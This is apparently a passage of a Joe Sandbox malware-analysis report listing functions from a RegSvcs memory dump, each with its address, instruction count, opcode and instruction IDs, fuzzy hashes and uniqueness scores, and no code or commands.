Instruction Fuzzy Hash: 3BD1C171A006169BDB18DF68CC94ABEB7E5FF94308F054A2DE916DF280EB34D951CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01678243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: c12f72bb5e183ee8ee4e36fe270bb2d4c2c6237607cb2d76f17159085ca17e91
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction Fuzzy Hash: B6B18175A00605AFDB24DF98CD48AABBBBEFF84305F10846DAA1297790DB34ED45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01600535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: 1efe0acc0ab433365da988d1c6d7d14d1e8aeba2b7678a8693ad39506d15694d
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: 09B1D571604646AFDB2ADB68CD54BBFBBF6AF84240F140199EA529B381DB30ED41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 015F83C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5b59accfb3f0bfc12bb96e1c3a00dfd3b97aee88ac8d35994b4845a959bd510
Instruction ID: 10b1db0d5c0b2c184bb9fd1cdb9864a32cad5ca7dfec0e1bbeb679e4a33fa473
Opcode Fuzzy Hash: b5b59accfb3f0bfc12bb96e1c3a00dfd3b97aee88ac8d35994b4845a959bd510
Instruction Fuzzy Hash: 2CC158702083419FD764CF19C884BABB7E5BF88304F44492DEA898B391E775E908CF92

Uniqueness

Uniqueness Score: -1.00%

Function 015EC427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edfbe2b13875f0362336a6c0aad464f04274432060d55cca73f724b2d489bfba
Instruction ID: 60431f0861a439580c603595460b33bf5c8ca2b2bdb83baac5f1d320959b93e6
Opcode Fuzzy Hash: edfbe2b13875f0362336a6c0aad464f04274432060d55cca73f724b2d489bfba
Instruction Fuzzy Hash: DEB16170A002668BDB28DF58C894BADB7F6BF44704F0485EAD54AEB241DB70DD85CF25

Uniqueness

Uniqueness Score: -1.00%

Function 0161E5E7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35f5a3c6cb3f0376044888fa117cb9e9169a265a881242f3ff5de665feea9244
Instruction ID: 348edecccf66435484a4b8547611bb1bba2d305de5c41ca189c43c2f8858aa6b
Opcode Fuzzy Hash: 35f5a3c6cb3f0376044888fa117cb9e9169a265a881242f3ff5de665feea9244
Instruction Fuzzy Hash: 65A12631E006659FEB22DB58CC48FAEBBA5AB00714F0901A9EE01AB3D5D775DD41CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 01630185 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1de0a6c88db3ae5ab4c23c1479c5a0cd11f01e4f4f054c5d6ddc1570c9b431c5
Instruction ID: 8c16bd29a5e24ae18026ca966093696743a9bd352e5ea48683d8672e26e9255c
Opcode Fuzzy Hash: 1de0a6c88db3ae5ab4c23c1479c5a0cd11f01e4f4f054c5d6ddc1570c9b431c5
Instruction Fuzzy Hash: B0A1B070A01716DFEB25CF69CC90BAAB7A5FF94318F044129EA45D7382DB34E916CB90

Uniqueness

Uniqueness Score: -1.00%

Function 016C4500 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a9b8b9a9d76869e2d1b96cc8a933078521625e53fd5ab3c408d0378875e28a5
Instruction ID: 76283214479067b98723038a6561ce7c6e0a63576165618a2c3b424b077c47f0
Opcode Fuzzy Hash: 8a9b8b9a9d76869e2d1b96cc8a933078521625e53fd5ab3c408d0378875e28a5
Instruction Fuzzy Hash: CCA1DC72A116129FC726DF18CDA0B2ABBEAFF58B04F05062CE5859B751CB34E801CB95

Uniqueness

Uniqueness Score: -1.00%

Function 016C2B57 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
Instruction ID: 0aaa41862d293b5aea4e4f064a2aff5a2c11ccc12ffe2c0b249b62e38ad4830d
Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
Instruction Fuzzy Hash: 51B13571E0061ADFDB29CFA9C890AAEBBB5FF58B10F14812DE914A7354D730A941CF90

Uniqueness

Uniqueness Score: -1.00%

Function 016760E0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fce9e86d8204a6a102db44c9d95c6d8f52eb581079d248771ec12d52d482393
Instruction ID: 138552f9b89a2d57f8c60f0e85fdad898a835085db7612f7a0f866faf082036c
Opcode Fuzzy Hash: 7fce9e86d8204a6a102db44c9d95c6d8f52eb581079d248771ec12d52d482393
Instruction Fuzzy Hash: 91918171D00616AFEB15CFA8DC84BAEBFB5AF48714F154169E610EB341D734E900DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0160E3F0 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69c7d2abb2bd74e7b265be2c49189f64b9c407a3fe6e4f6f26369604888c04a6
Instruction ID: 1c0b01f11c8c04640aec9b3627e0088ddc5629133d3a6fa77491fbfd31a367c4
Opcode Fuzzy Hash: 69c7d2abb2bd74e7b265be2c49189f64b9c407a3fe6e4f6f26369604888c04a6
Instruction Fuzzy Hash: 2F912631A01622CBDB2ADB58CC44B7F7BA2EF94714F0A4969ED059B3C0E736D842CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01646ACC Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8535a7b025f4ec15c09dda3bacf5aa65349ccb4975e64eef44e844e9182286db
Instruction ID: 3c6e3813ed6d1c69a43e1a867faee587451ba07773b0ece7473e9798f02e4c29
Opcode Fuzzy Hash: 8535a7b025f4ec15c09dda3bacf5aa65349ccb4975e64eef44e844e9182286db
Instruction Fuzzy Hash: D981A271E006169FDB18CF69D940ABEBBF9FB48700F04852EE455D7640E734D941CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 016BAB40 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
Instruction ID: 6ce4ea2a21d79136b3568ceb9d1e13bc86ce60595087028ad38b448312d83fff
Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
Instruction Fuzzy Hash: 0F816F72A0020A9FDF19CF99C8D0AEEBBB6BF84310F18856DD9169B345D734E941CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0162E284 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22f6e20a24e8a435ecaee303e33d4702bd6ee61edc1d16f11907bb8bd737d91d
Instruction ID: 215dd5212634657f49783dccc58a856a5d5199d0d2f056e6c2a6f40b3955ad0f
Opcode Fuzzy Hash: 22f6e20a24e8a435ecaee303e33d4702bd6ee61edc1d16f11907bb8bd737d91d
Instruction Fuzzy Hash: 5B812F71A00A19AFDB25CFA9CC80AEABBFAFF88354F14442DE555A7250D731AC45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0160C640 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64cdcd9e2c78e189288bb52ded0ca639e12d593a8c27c19433c21360cbc97fec
Instruction ID: cdc88bd52594a4174b126434a23ecab1923af1ef266161bc31a7d2d810459803
Opcode Fuzzy Hash: 64cdcd9e2c78e189288bb52ded0ca639e12d593a8c27c19433c21360cbc97fec
Instruction Fuzzy Hash: C071BE75D00629DBCB2A8F59DC907BEBBF5FF58710F14425AE942AB390E7749801CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 016A47A0 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 84c6646a0b9ff8afba29486783dfcc98f7c43c7cf8c76aa2969eef82992bafc4
Instruction ID: 065aa0c37764fb7af3e079363a5e00294aa922019f0a8e4a34d19e088547c8c5
Opcode Fuzzy Hash: 84c6646a0b9ff8afba29486783dfcc98f7c43c7cf8c76aa2969eef82992bafc4
Instruction Fuzzy Hash: 1A719271901205EFDB20CF59DD54A9ABBF9FFA0700F88525AE701AB258CBB29D50CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0160260B Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e3cb81acec39c179f543a17aade44748c71e4b373e9479b90336041b31ec7ab
Instruction ID: 925701ec76766b771899c9e716ca77d2ce8f82052101aea3c7e088ebb0fa4dde
Opcode Fuzzy Hash: 0e3cb81acec39c179f543a17aade44748c71e4b373e9479b90336041b31ec7ab
Instruction Fuzzy Hash: 8471C1356142528FD316DF28C894B6BB7E5FF84310F0485AEE8998B392DB34DC46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0167035C Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
Instruction ID: 428706b502649bf323acbbb477bcb16837392b3d3633664683a7b34565180480
Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
Instruction Fuzzy Hash: 43717D71A00609EFDB15DFA9CD84A9EBBB9FF48304F104569E505EB290DB34EA01CB64

Uniqueness

Uniqueness Score: -1.00%

Function 016862A0 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6c4faa06d233fb784d886319c3dc6be67b9255c19d1ff6c15ba3aa997420e51
Instruction ID: 72da9c1ce94f4e1585f4d1231ac687b5bc8a8df70c0c38d361727afba22bca4d
Opcode Fuzzy Hash: b6c4faa06d233fb784d886319c3dc6be67b9255c19d1ff6c15ba3aa997420e51
Instruction Fuzzy Hash: 9E71E232200B01AFE736AF18CC54F6ABBB6EF40724F14862CE2569B2A1D775E944CB54

Uniqueness

Uniqueness Score: -1.00%

Function 016C8324 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f83fff630be625f2fc7aff035a459211d0cc8742fc6f3fbf696f084fbe9984d1
Instruction ID: 17a996226f7a8d2158399e9a5b532c94d3f6afcf3da6320de1a687f4e93068fa
Opcode Fuzzy Hash: f83fff630be625f2fc7aff035a459211d0cc8742fc6f3fbf696f084fbe9984d1
Instruction Fuzzy Hash: 37711871E00209AFDB26DF94CC81FEEBBB9FB14750F10416DE615A7290D774AA05CB94

Uniqueness

Uniqueness Score: -1.00%

Function 016AA250 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68f249ad51301c1150daef9755e8343ff552a868d2c23733dc8d2c79dc522be8
Instruction ID: e31607ed5d3286f07b9e7b4ed5c1ddad526d9e8dd5a080c5db7df35f1fee93b3
Opcode Fuzzy Hash: 68f249ad51301c1150daef9755e8343ff552a868d2c23733dc8d2c79dc522be8
Instruction Fuzzy Hash: 2851CF72505612AFD712DEA8CC44A6BBBE9EBC5710F41096EFA40DB250D770ED09CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01698350 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 624da6657580d51c7d84eda062480faeb57bfeb1dfd4682ffd38c96299f8be2b
Instruction ID: 37cf3fa39d2b362a9c5a97950085284310721f2a80bb1d69426a5ef32a872e6f
Opcode Fuzzy Hash: 624da6657580d51c7d84eda062480faeb57bfeb1dfd4682ffd38c96299f8be2b
Instruction Fuzzy Hash: 83519D70900709DBDB21DF9ACC80AABFBFDBF95710F10461ED296976A1C7B0A545CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0162E443 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a35f2240e39a22c277637257add3ad2ae0c33a43c1154e94c82792c801287fb3
Instruction ID: 1911f84a6e169eebf16759c03f2e1253cec653eeb4c180d22d420ec646bc0bae
Opcode Fuzzy Hash: a35f2240e39a22c277637257add3ad2ae0c33a43c1154e94c82792c801287fb3
Instruction Fuzzy Hash: DF514771210A15DFCB26EF69CD80EAAB3AAFF54785F40042EE94297260D735E941CB54

Uniqueness

Uniqueness Score: -1.00%

Function 01694180 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: becf690a4a640ae070c215687cd417c6d428ed54f63ae1f35f594a998893331e
Instruction ID: 387ea6b307ebddac843f0c3fc95889832de12b410a40f2490cd6fa4e9a8ce08d
Opcode Fuzzy Hash: becf690a4a640ae070c215687cd417c6d428ed54f63ae1f35f594a998893331e
Instruction Fuzzy Hash: F25146716083029FDB54DF2ACD81A6BB7EABFC8218F444A2DF585C7350DB30D9068B96

Uniqueness

Uniqueness Score: -1.00%

Function 016145B1 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
Instruction ID: 0ec74035f5380060e99bface80fd3de0af0b4fdcdba875802bb4594abf4a0543
Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
Instruction Fuzzy Hash: E2517C71E0021AABDF15DF98C840BFEBBB6AF45754F188069EA01AB344DB34DD45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0167E9E0 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
Instruction ID: 48b21ccce9dcc929f2fd9c42e25afb7926b7918bd7cba2e6d595ba378fb12aef
Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
Instruction Fuzzy Hash: 9151D931D0020AEFDF11DB94CD94BBEBF79AF44714F114699DA1267290D7329D48CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 016B8B28 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2219612464aa17a8bc8c9cc45324725cd271ef632a2d7843ab5db173e56fe3c7
Instruction ID: 196b86c85c6244924811755fe56519b55ea2c87008626ffc07ca48768edf75a9
Opcode Fuzzy Hash: 2219612464aa17a8bc8c9cc45324725cd271ef632a2d7843ab5db173e56fe3c7
Instruction Fuzzy Hash: 3141B5B17016119BDB29DB2DCCD4BFBBB9EEF90620F048219E95987391DB34D881C791

Uniqueness

Uniqueness Score: -1.00%

Function 0167CBF0 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d8b48e7d9df4313f1b8857bbba58b84bb7ff3d32c5e153b397c8489f42cc363
Instruction ID: e640ae6bcfa04906d21644b4dca0a8033ae35e8f47db05de3b49b4491d2f5ad2
Opcode Fuzzy Hash: 4d8b48e7d9df4313f1b8857bbba58b84bb7ff3d32c5e153b397c8489f42cc363
Instruction Fuzzy Hash: F951887290021ADFCB20DFA9CD909AEBBFAFF58354B154619D645A7344EB30AD42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 016BA9D3 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
Instruction ID: d4859f65cc4742e9b39f08d8aaee08c0e6921ef035c94022760ccd1575c7ba5d
Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
Instruction Fuzzy Hash: 8D41E7716007169FD729CFA8CDD4AABB7A9FF80210B05862EED5287340EB30EC45C794

Uniqueness

Uniqueness Score: -1.00%

Function 016201F8 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a168b9fee5c969659daef2b2cd77a5b7f9460602913a73f7ef730a2080ead50
Instruction ID: 66a55ada2675d53ffdb0d6d57067dbb251024f0550589c77af9de12cc73414ee
Opcode Fuzzy Hash: 8a168b9fee5c969659daef2b2cd77a5b7f9460602913a73f7ef730a2080ead50
Instruction Fuzzy Hash: D241CE369016269BDB14DFA8C840AEEBBB5BF59710F14822EF805F7340D735AC01CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0161EBFC Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e56e630525d809f1b58be27456ec1dee1ad6d52417b1646604cd8a4a81271a88
Instruction ID: 94143b2eff186dc4b3ebd34121c0ca83658e400f1d78752fe2e56e75933fd4fd
Opcode Fuzzy Hash: e56e630525d809f1b58be27456ec1dee1ad6d52417b1646604cd8a4a81271a88
Instruction Fuzzy Hash: 4841C1726003029FD726DF28CC84A57B7EAFF88214F08496DE966C7355DB32E8458B55

Uniqueness

Uniqueness Score: -1.00%

Function 01632750 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
Instruction ID: c4d92ac6529a53ca4499ea8ef849cc3095c5419c1cb6c2ba7a1b392552ed9e52
Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
Instruction Fuzzy Hash: 94516875A01215CFCB15CF98C980AAEF7B6FF84710F2881A9D915E7355D730AE82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 015F6154 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daa8cfdc9d26cb64501f175e2c5e044bebaddb2b32da2ea19fc174afd61112bb
Instruction ID: 9d14733006e93b3f7ca416a52e1b1a81c14868c3583ffa8f565abdb755eb9980
Opcode Fuzzy Hash: daa8cfdc9d26cb64501f175e2c5e044bebaddb2b32da2ea19fc174afd61112bb
Instruction Fuzzy Hash: E851D570900257DBDB2A9B68CC14BAEBBF1FF15314F1482ADE6299B2D1D7349981CF84

Uniqueness

Uniqueness Score: -1.00%

Function 015F0BCD Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf4786017933eb51352135582a6aa900a3a4ec25b01854456c372f2dd9ca5457
Instruction ID: d1330c3426d51c5a41f3aba110ceaff6cc9f7495d8b67b3a356c212549abe6ad
Opcode Fuzzy Hash: cf4786017933eb51352135582a6aa900a3a4ec25b01854456c372f2dd9ca5457
Instruction Fuzzy Hash: 3C41A536A402299FDB21DF68CD40BEEB7B5FF45740F0500A9E948AB281D7749E80CF55

Uniqueness

Uniqueness Score: -1.00%

Function 016B866E Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
Instruction ID: 388781752535f1691cb1f6e7d779a47bc979d0cdf174433f698de98c731cb792
Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
Instruction Fuzzy Hash: E6418175B10216ABDB15DB99CCC4AFFBBBEAF88604F144069E904E7341D770DD418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 015F0887 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c86f6c4e7cc323d16c282559f613c80a4b3a3ca871e43fd761764212c2185ba
Instruction ID: 539134b74ac8c05f01464049465188ac62e589eacce103faaed3e01df554a8b0
Opcode Fuzzy Hash: 9c86f6c4e7cc323d16c282559f613c80a4b3a3ca871e43fd761764212c2185ba
Instruction Fuzzy Hash: 2241F6716007029FE725CF28C990A27B7F6FF44314B184A6DE6578B692E731F845CB94

Uniqueness

Uniqueness Score: -1.00%

